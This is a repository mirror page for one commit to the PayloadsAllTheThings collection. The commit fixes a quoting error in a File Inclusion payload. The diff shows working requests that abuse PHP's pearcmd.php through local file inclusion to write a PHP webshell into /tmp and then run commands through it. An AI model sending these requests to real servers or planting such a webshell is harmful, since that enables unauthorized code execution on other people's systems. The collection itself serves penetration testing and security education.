ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 10:26:09 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Add two methods about LFI to RCE via PHP PEARCMD, and delete extra double quotes in method 2 payload

Browse Source
This commit is contained in:
Str3am 2023-11-01 00:35:59 +08:00 committed by GitHub
parent 072cac04d6
commit 95a85b455d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
File Inclusion/README.md
View File

@ -516,7 +516,7 @@ There are this ways to exploit it.
```
* Method 2: man_dir
```ps1
/vuln.php?file=/usr/local/lib/php/pearcmd.php&+-c+/tmp/exec.php+-d+man_dir=<?echo(system($_GET['c']));?>+-s+"
/vuln.php?file=/usr/local/lib/php/pearcmd.php&+-c+/tmp/exec.php+-d+man_dir=<?echo(system($_GET['c']));?>+-s+
/vuln.php?file=/tmp/exec.php&c=id
```
The created configuration file contains the webshell.